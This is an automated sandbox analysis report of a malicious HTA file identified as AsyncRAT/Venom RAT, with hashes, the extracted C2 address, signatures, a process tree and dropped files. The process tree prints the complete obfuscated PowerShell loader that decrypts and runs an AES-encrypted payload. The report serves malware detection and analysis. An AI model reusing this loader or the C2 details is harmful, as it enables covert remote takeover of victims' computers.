Analysis

  • max time kernel
    0s
  • max time network
    112s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20231215-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20231215-enlocale:en-usos:windows10-2004-x64system
  • submitted
    10-01-2024 21:28

General

  • Target

    163.5.169.28/SCAN-atoletter3.hta

  • Size

    1.1MB

  • MD5

    65a82ba108814502f8de8f9c918c1637

  • SHA1

    81bb281aff6d485787f79558b2433a529af5d53b

  • SHA256

    dceca8e7f6baca5bd3417c0e05a1e9e934a0c72fe36c79fd3aca451ea2168d76

  • SHA512

    477a94c061e96c5b8cdc256e746eb9dbd57339c93bcbd90bb66e2b6d21a7ff9e35b3b0ac7eac7a4c2b308306b06178060c38bce1470f5d94af32d07a97ce2621

  • SSDEEP

    1536:MUQr+podgEt/pvBYwPBONWBImr/l1vcmafSIm+lIWFWY7Cy5h7OIxeZeDG52VP+q:ArooW8vhXBHuV

Score
10/10

Malware Config

Extracted

Family

asyncrat

Version

Venom RAT + HVNC + Stealer + Grabber v6.0.2

Botnet

Default

C2

5.182.87.154:4449

Mutex

jiqsvporltpvroy

Attributes
  • delay

    1

  • install

    false

  • install_folder

    %AppData%

aes.plain

Signatures

  • AsyncRat

    AsyncRAT is designed to remotely monitor and control other computers written in C#.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

Processes

  • C:\Windows\SysWOW64\mshta.exe
    C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\163.5.169.28\SCAN-atoletter3.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
    1⤵
    • Checks computer location settings
    PID:4792
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted Start-Process 'cmd.exe' -WindowStyle hidden -ArgumentList {/c powershell.exe $QSAxJ = 'AAAAAAAAAAAAAAAAAAAAAEVCYhPxkB9Pvx13+D7sCkBIDkr/feJ+8IkDwxt6lYAby98BRZWUsDSmh+zJoRSO27WxlPC5j1pEXBpEQHGBXBIfgGKgMuMJSwct1pdT4AmRUFHKG7fMfWuR6jXRm98nBkQPaj7xcpD6nSLM/CZv3BgGUsqLSMnprxvqVKcLMUrx1+ZAMT+68gclz0g6bY0UPkizERpnjhJLs0ggWsiy32ddEKBk19nSMLfyQ19JBq74ZMpOVfFxLMTIWB/8kDMnzLxRAYLnQfM/hhNVOqe0N0AfZxP9SRmAHkqgPL3ItS786b1Z7KsDisFoPJJQNCsXRkY4Gq0IKrTS/0oGkB82DsRWDHsEmfIN2I6DZMZvJ0Lp47fV10aoX2YRVTQRP/dkvLhC76+b02EZearv985N0xBkxWR/4qRhtVq77owCZik6gvMxNceqPC+EukG5NbPM9YVlQADzyrZDtOKGtFBaod14dnB9TqC0Gu4Gx9zQag7iEXZemYdl4RtgUbrgtgvCxK4osRFXyZV6zfsxnBMbjU95oNFJb3JklaF4yIQuK6hSSKYnGPo6PSpmzvGg3M9W5RyWc/SNDVkGcvMZJBEIfNyVsNeUYrQxJB/H7qb8LXhrCcFFR8VW/De98AHkYeKR/plZsLa7oUtgq7H+O9/bciv64Hs2FEO3bru8eosZVhr9GSbDDAzWFuv8QHlxeU7rjR+kYL7bTJHsg91dezbRSjTBymg70B6z+HL7NI7Botdke+29khbtYwuOwkgPOZytR/YdiXPaR5YssB3kEewbuOW4P1REffWdAuf6aD+VhBoQj9OVE0RAbv87AOgokGxiGLx+fA4wToU4o/AM5uY4zOndxaIwaIdxNjR5PenhntENqzRD8VSIDtBhIIDqPoauUr1WFmYsHowo9UT82q9VSXE1ozMSKP3DgFjrXo+K0cJAquGd5LZFl5jAjIbOF6OEa6aab2SSlPuGKsw+1JQ+31bXx+g2PCrIwVfvomyzrO5Y0bm6VuCAp8PwQSglQnRFLA==';$CYVFUMU = 'U3l4ZnltaHVrRlhBSERMSklOa29VclVpQlVvT3VpSmQ=';$WjkWJHlT = New-Object 'System.Security.Cryptography.AesManaged';$WjkWJHlT.Mode = [System.Security.Cryptography.CipherMode]::ECB;$WjkWJHlT.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$WjkWJHlT.BlockSize = 128;$WjkWJHlT.KeySize = 256;$WjkWJHlT.Key = [System.Convert]::FromBase64String($CYVFUMU);$vCffd = [System.Convert]::FromBase64String($QSAxJ);$KujCHXfb = $vCffd[0..15];$WjkWJHlT.IV = $KujCHXfb;$lsWWLMmAD = $WjkWJHlT.CreateDecryptor();$MVpgCwqji = $lsWWLMmAD.TransformFinalBlock($vCffd, 16, $vCffd.Length - 16);$WjkWJHlT.Dispose();$Vixp = New-Object System.IO.MemoryStream( , $MVpgCwqji );$lXxkNy = New-Object System.IO.MemoryStream;$StnaluuLT = New-Object System.IO.Compression.GzipStream $Vixp, ([IO.Compression.CompressionMode]::Decompress);$StnaluuLT.CopyTo( $lXxkNy );$StnaluuLT.Close();$Vixp.Close();[byte[]] $qIJwjSw = $lXxkNy.ToArray();$lwnIytSZ = [System.Text.Encoding]::UTF8.GetString($qIJwjSw);$lwnIytSZ | powershell - }
      2⤵
        PID:4576
        • C:\Windows\SysWOW64\cmd.exe
          "C:\Windows\system32\cmd.exe" /c powershell.exe $QSAxJ = 'AAAAAAAAAAAAAAAAAAAAAEVCYhPxkB9Pvx13+D7sCkBIDkr/feJ+8IkDwxt6lYAby98BRZWUsDSmh+zJoRSO27WxlPC5j1pEXBpEQHGBXBIfgGKgMuMJSwct1pdT4AmRUFHKG7fMfWuR6jXRm98nBkQPaj7xcpD6nSLM/CZv3BgGUsqLSMnprxvqVKcLMUrx1+ZAMT+68gclz0g6bY0UPkizERpnjhJLs0ggWsiy32ddEKBk19nSMLfyQ19JBq74ZMpOVfFxLMTIWB/8kDMnzLxRAYLnQfM/hhNVOqe0N0AfZxP9SRmAHkqgPL3ItS786b1Z7KsDisFoPJJQNCsXRkY4Gq0IKrTS/0oGkB82DsRWDHsEmfIN2I6DZMZvJ0Lp47fV10aoX2YRVTQRP/dkvLhC76+b02EZearv985N0xBkxWR/4qRhtVq77owCZik6gvMxNceqPC+EukG5NbPM9YVlQADzyrZDtOKGtFBaod14dnB9TqC0Gu4Gx9zQag7iEXZemYdl4RtgUbrgtgvCxK4osRFXyZV6zfsxnBMbjU95oNFJb3JklaF4yIQuK6hSSKYnGPo6PSpmzvGg3M9W5RyWc/SNDVkGcvMZJBEIfNyVsNeUYrQxJB/H7qb8LXhrCcFFR8VW/De98AHkYeKR/plZsLa7oUtgq7H+O9/bciv64Hs2FEO3bru8eosZVhr9GSbDDAzWFuv8QHlxeU7rjR+kYL7bTJHsg91dezbRSjTBymg70B6z+HL7NI7Botdke+29khbtYwuOwkgPOZytR/YdiXPaR5YssB3kEewbuOW4P1REffWdAuf6aD+VhBoQj9OVE0RAbv87AOgokGxiGLx+fA4wToU4o/AM5uY4zOndxaIwaIdxNjR5PenhntENqzRD8VSIDtBhIIDqPoauUr1WFmYsHowo9UT82q9VSXE1ozMSKP3DgFjrXo+K0cJAquGd5LZFl5jAjIbOF6OEa6aab2SSlPuGKsw+1JQ+31bXx+g2PCrIwVfvomyzrO5Y0bm6VuCAp8PwQSglQnRFLA==';$CYVFUMU = 'U3l4ZnltaHVrRlhBSERMSklOa29VclVpQlVvT3VpSmQ=';$WjkWJHlT = New-Object 'System.Security.Cryptography.AesManaged';$WjkWJHlT.Mode = [System.Security.Cryptography.CipherMode]::ECB;$WjkWJHlT.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$WjkWJHlT.BlockSize = 128;$WjkWJHlT.KeySize = 256;$WjkWJHlT.Key = [System.Convert]::FromBase64String($CYVFUMU);$vCffd = [System.Convert]::FromBase64String($QSAxJ);$KujCHXfb = $vCffd[0..15];$WjkWJHlT.IV = $KujCHXfb;$lsWWLMmAD = $WjkWJHlT.CreateDecryptor();$MVpgCwqji = $lsWWLMmAD.TransformFinalBlock($vCffd, 16, $vCffd.Length - 16);$WjkWJHlT.Dispose();$Vixp = New-Object System.IO.MemoryStream( , $MVpgCwqji );$lXxkNy = New-Object System.IO.MemoryStream;$StnaluuLT = New-Object System.IO.Compression.GzipStream $Vixp, ([IO.Compression.CompressionMode]::Decompress);$StnaluuLT.CopyTo( $lXxkNy );$StnaluuLT.Close();$Vixp.Close();[byte[]] $qIJwjSw = $lXxkNy.ToArray();$lwnIytSZ = [System.Text.Encoding]::UTF8.GetString($qIJwjSw);$lwnIytSZ | powershell -
          3⤵
            PID:1688
            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              powershell -
              4⤵
                PID:428
                • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
                  "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" "C:\Users\Admin\SCAN-atoletter3.pdf"
                  5⤵
                    PID:2624
                    • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                      "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=16514043
                      6⤵
                        PID:1468
                        • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                          "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=7F2A89A0BC930702FD85ABC405EE419D --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=7F2A89A0BC930702FD85ABC405EE419D --renderer-client-id=2 --mojo-platform-channel-handle=1716 --allow-no-sandbox-job /prefetch:1
                          7⤵
                            PID:1920
                          • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                            "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=F5177C8736E6322EC3746CD9698BB237 --mojo-platform-channel-handle=1624 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
                            7⤵
                              PID:3060
                            • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                              "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=BC58B9D215D0D3863C57555D96B8580B --mojo-platform-channel-handle=2284 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
                              7⤵
                                PID:2476
                              • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=8F4E2B9F79A0E59B6578FB16148414DD --mojo-platform-channel-handle=1956 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
                                7⤵
                                  PID:3632
                                • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                  "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=D73C2B97B4B33E2DC94864C8245A63EB --mojo-platform-channel-handle=2412 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
                                  7⤵
                                    PID:2068
                                  • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                    "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=7875038E558A815BB6FBDC5D6032919C --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=7875038E558A815BB6FBDC5D6032919C --renderer-client-id=8 --mojo-platform-channel-handle=1944 --allow-no-sandbox-job /prefetch:1
                                    7⤵
                                      PID:1032
                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                powershell.exe $QSAxJ = 'AAAAAAAAAAAAAAAAAAAAAEVCYhPxkB9Pvx13+D7sCkBIDkr/feJ+8IkDwxt6lYAby98BRZWUsDSmh+zJoRSO27WxlPC5j1pEXBpEQHGBXBIfgGKgMuMJSwct1pdT4AmRUFHKG7fMfWuR6jXRm98nBkQPaj7xcpD6nSLM/CZv3BgGUsqLSMnprxvqVKcLMUrx1+ZAMT+68gclz0g6bY0UPkizERpnjhJLs0ggWsiy32ddEKBk19nSMLfyQ19JBq74ZMpOVfFxLMTIWB/8kDMnzLxRAYLnQfM/hhNVOqe0N0AfZxP9SRmAHkqgPL3ItS786b1Z7KsDisFoPJJQNCsXRkY4Gq0IKrTS/0oGkB82DsRWDHsEmfIN2I6DZMZvJ0Lp47fV10aoX2YRVTQRP/dkvLhC76+b02EZearv985N0xBkxWR/4qRhtVq77owCZik6gvMxNceqPC+EukG5NbPM9YVlQADzyrZDtOKGtFBaod14dnB9TqC0Gu4Gx9zQag7iEXZemYdl4RtgUbrgtgvCxK4osRFXyZV6zfsxnBMbjU95oNFJb3JklaF4yIQuK6hSSKYnGPo6PSpmzvGg3M9W5RyWc/SNDVkGcvMZJBEIfNyVsNeUYrQxJB/H7qb8LXhrCcFFR8VW/De98AHkYeKR/plZsLa7oUtgq7H+O9/bciv64Hs2FEO3bru8eosZVhr9GSbDDAzWFuv8QHlxeU7rjR+kYL7bTJHsg91dezbRSjTBymg70B6z+HL7NI7Botdke+29khbtYwuOwkgPOZytR/YdiXPaR5YssB3kEewbuOW4P1REffWdAuf6aD+VhBoQj9OVE0RAbv87AOgokGxiGLx+fA4wToU4o/AM5uY4zOndxaIwaIdxNjR5PenhntENqzRD8VSIDtBhIIDqPoauUr1WFmYsHowo9UT82q9VSXE1ozMSKP3DgFjrXo+K0cJAquGd5LZFl5jAjIbOF6OEa6aab2SSlPuGKsw+1JQ+31bXx+g2PCrIwVfvomyzrO5Y0bm6VuCAp8PwQSglQnRFLA==';$CYVFUMU = 'U3l4ZnltaHVrRlhBSERMSklOa29VclVpQlVvT3VpSmQ=';$WjkWJHlT = New-Object 'System.Security.Cryptography.AesManaged';$WjkWJHlT.Mode = [System.Security.Cryptography.CipherMode]::ECB;$WjkWJHlT.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$WjkWJHlT.BlockSize = 128;$WjkWJHlT.KeySize = 256;$WjkWJHlT.Key = [System.Convert]::FromBase64String($CYVFUMU);$vCffd = [System.Convert]::FromBase64String($QSAxJ);$KujCHXfb = $vCffd[0..15];$WjkWJHlT.IV = $KujCHXfb;$lsWWLMmAD = $WjkWJHlT.CreateDecryptor();$MVpgCwqji = $lsWWLMmAD.TransformFinalBlock($vCffd, 16, $vCffd.Length - 16);$WjkWJHlT.Dispose();$Vixp = New-Object System.IO.MemoryStream( , $MVpgCwqji );$lXxkNy = New-Object System.IO.MemoryStream;$StnaluuLT = New-Object System.IO.Compression.GzipStream $Vixp, ([IO.Compression.CompressionMode]::Decompress);$StnaluuLT.CopyTo( $lXxkNy );$StnaluuLT.Close();$Vixp.Close();[byte[]] $qIJwjSw = $lXxkNy.ToArray();$lwnIytSZ = [System.Text.Encoding]::UTF8.GetString($qIJwjSw);$lwnIytSZ
                                4⤵
                                  PID:4416
                          • C:\Windows\System32\CompPkgSrv.exe
                            C:\Windows\System32\CompPkgSrv.exe -Embedding
                            1⤵
                              PID:1720
                            • C:\Users\Admin\AppData\Roaming\fd1.exe
                              C:\Users\Admin\AppData\Roaming\fd1.exe
                              1⤵
                                PID:3612
                              • C:\Users\Admin\AppData\Roaming\fd1.exe
                                C:\Users\Admin\AppData\Roaming\fd1.exe
                                1⤵
                                  PID:3104

                                Network

                                MITRE ATT&CK Enterprise v15

                                Replay Monitor

                                Loading Replay Monitor...

                                Downloads

                                • C:\Users\Admin\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages

                                  Filesize

                                  56KB

                                  MD5

                                  c26ed30e7d5ab440480838636efc41db

                                  SHA1

                                  c66e0d00b56abebfb60d2fcc5cf85ad31a0d6591

                                  SHA256

                                  6a3c5c4a8e57f77ecc22078fbf603ecc31fb82d429bd87b7b4b9261447092aef

                                  SHA512

                                  96cdb78bca3e01d4513c31661987e5646e6a8ff24708918aa0d66dfa3ca5d98af4862c9f38c4f41f933c345d2d3adfb1d34d1430b33f45f916f41a9872a030df

                                • C:\Users\Admin\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages

                                  Filesize

                                  56KB

                                  MD5

                                  752a1f26b18748311b691c7d8fc20633

                                  SHA1

                                  c1f8e83eebc1cc1e9b88c773338eb09ff82ab862

                                  SHA256

                                  111dac2948e4cecb10b0d2e10d8afaa663d78d643826b592d6414a1fd77cc131

                                  SHA512

                                  a2f5f262faf2c3e9756da94b2c47787ce3a9391b5bd53581578aa9a764449e114836704d6dec4aadc097fed4c818831baa11affa1eb25be2bfad9349bb090fe5

                                • C:\Users\Admin\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages

                                  Filesize

                                  64KB

                                  MD5

                                  d109c99842512a3f7fe0c1308d36b3c7

                                  SHA1

                                  1561d5176cf03ab242569344150b8236f73ab7a7

                                  SHA256

                                  052515e60602047c382f6fe09872abc5689b1f414df73e7189ab6cb5daa832dd

                                  SHA512

                                  8a03228e4a6af6c6f7475af613daa8f6f7bdefbc622509afcd8cd414a379f48b46968fb2d90b79e5befc199c09c998f5964eb432214dbe7c24f792a6503c5d41

                                • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\fd1.exe.log

                                  Filesize

                                  1KB

                                  MD5

                                  9f5d0107d96d176b1ffcd5c7e7a42dc9

                                  SHA1

                                  de83788e2f18629555c42a3e6fada12f70457141

                                  SHA256

                                  d0630b8466cebaaf92533826f6547b6f36a3c480848dc38d650acd52b522a097

                                  SHA512

                                  86cfaa3327b59a976ddd4a5915f3fe8c938481344fcbd10e7533b4c5003673d078756e62435940471658a03504c3bc30603204d6a133727a3f36c96d08714c61

                                • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

                                  Filesize

                                  1KB

                                  MD5

                                  def65711d78669d7f8e69313be4acf2e

                                  SHA1

                                  6522ebf1de09eeb981e270bd95114bc69a49cda6

                                  SHA256

                                  aa1c97cdbce9a848f1db2ad483f19caa535b55a3a1ef2ad1260e0437002bc82c

                                  SHA512

                                  05b2f9cd9bc3b46f52fded320b68e05f79b2b3ceaeb13e5d87ae9f8cd8e6c90bbb4ffa4da8192c2bfe0f58826cabff2e99e7c5cc8dd47037d4eb7bfc6f2710a7

                                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                  Filesize

                                  15KB

                                  MD5

                                  4442ee18c40e9b0ef74b79e45e8eb179

                                  SHA1

                                  6a51598cf115928b7aeac1902a1120b48bf37eda

                                  SHA256

                                  3abfe344abad76a9d7a023c8810c6b41e9c916a22aa780d33ac1abb21b9ae603

                                  SHA512

                                  8d5e7b9c57b34610fb77977805a23941533fed10267986461bebcb6d8f1ea4a69a95da4e9c68f1d4428e7d8daa14150d674b7cfe820b952283ceb7e81ffd6c5f

                                • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_15p0ju5j.z30.ps1

                                  Filesize

                                  60B

                                  MD5

                                  d17fe0a3f47be24a6453e9ef58c94641

                                  SHA1

                                  6ab83620379fc69f80c0242105ddffd7d98d5d9d

                                  SHA256

                                  96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                                  SHA512

                                  5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                                • C:\Users\Admin\AppData\Roaming\fd1.exe

                                  Filesize

                                  649KB

                                  MD5

                                  b9a42052c81229de87b90370c7e8ef56

                                  SHA1

                                  8253ef8fe65f68ea7e0cc11bcdc06ec91c8d3290

                                  SHA256

                                  2799308c4b285f662d2954b3d9900951d74ae0cdde04b80ff865221817103f3b

                                  SHA512

                                  0e6a1b3d66c2401f8b8d5f8b2cae7d4912fa73565faf4c21686caa63a0d81eda952d6070edb57e7577c15c896caff3e52a6671713cfaa13ed21bab7accb86755

                                • C:\Users\Admin\SCAN-atoletter3.pdf

                                  Filesize

                                  169KB

                                  MD5

                                  bcb62044282191bb5294c1435de71a18

                                  SHA1

                                  69eaa574d9b0118424c7b204724351811aa0c015

                                  SHA256

                                  354993c4965d7445b37c6b256f4c1c5c2086c0b1ec5736b9f179bcd6387a194f

                                  SHA512

                                  d2737e5418b4bf0ec7ad736cb4707516e702667f57da1ead88cd0f012f188b087fca8520bb1fb9881356bc920027b177349905a2150784bbf79d039eb3c0e6ad

                                • memory/428-76-0x00000000084A0000-0x00000000084BE000-memory.dmp

                                  Filesize

                                  120KB

                                • memory/428-77-0x00000000029B0000-0x00000000029C0000-memory.dmp

                                  Filesize

                                  64KB

                                • memory/428-66-0x000000006E740000-0x000000006EA94000-memory.dmp

                                  Filesize

                                  3.3MB

                                • memory/428-54-0x0000000006920000-0x0000000006964000-memory.dmp

                                  Filesize

                                  272KB

                                • memory/428-78-0x00000000029B0000-0x00000000029C0000-memory.dmp

                                  Filesize

                                  64KB

                                • memory/428-80-0x00000000085F0000-0x00000000085FA000-memory.dmp

                                  Filesize

                                  40KB

                                • memory/428-28-0x0000000071B10000-0x00000000722C0000-memory.dmp

                                  Filesize

                                  7.7MB

                                • memory/428-79-0x0000000008500000-0x00000000085A3000-memory.dmp

                                  Filesize

                                  652KB

                                • memory/428-42-0x00000000029B0000-0x00000000029C0000-memory.dmp

                                  Filesize

                                  64KB

                                • memory/428-65-0x000000006E3D0000-0x000000006E41C000-memory.dmp

                                  Filesize

                                  304KB

                                • memory/428-81-0x0000000008600000-0x0000000008611000-memory.dmp

                                  Filesize

                                  68KB

                                • memory/428-36-0x0000000005DF0000-0x0000000006144000-memory.dmp

                                  Filesize

                                  3.3MB

                                • memory/428-64-0x00000000084C0000-0x00000000084F2000-memory.dmp

                                  Filesize

                                  200KB

                                • memory/428-35-0x00000000029B0000-0x00000000029C0000-memory.dmp

                                  Filesize

                                  64KB

                                • memory/428-63-0x000000007F210000-0x000000007F220000-memory.dmp

                                  Filesize

                                  64KB

